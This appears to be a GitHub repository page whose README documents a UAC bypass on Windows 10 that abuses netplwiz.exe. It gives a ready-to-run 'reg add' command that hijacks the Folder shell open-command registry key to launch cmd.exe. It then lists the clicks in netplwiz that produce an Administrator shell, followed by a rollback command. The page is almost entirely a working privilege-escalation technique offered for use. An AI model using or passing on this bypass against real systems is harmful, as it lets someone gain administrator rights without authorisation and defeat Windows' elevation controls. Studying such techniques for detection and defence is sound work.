Skip to content

sailay1996/GUI_UAC_bypassX

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 

Repository files navigation

GUI_UAC_bypassX

gui uac bypass (netplwiz.exe)

  • Type: GUI Hack
  • Method: Registry key manipulation
  • Target: \system32\netplwiz.exe
  • Component(s): Attacker defined
  • Works from: window 10

HKCU\Software\Classes\Folder\shell\open\command was called when click manage passwords button in netplwiz.exe test x

Produce steps:

  • Run command
    reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c cmd.exe" /f && reg add HKCU\Software\Classes\Folder\shell\open\command /v "DelegateExecute" /f
  • run netplwiz.exe in cmd .
  • Select the "Advanced" tab, and click the "Manage Passwords" button.
  • then you will get Administrator Shell.
    test

Rollback command :

reg delete "HKCU\Software\Classes\Folder\shell\open\command" /f

@404death

About

gui uac bypass (netplwiz.exe)

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published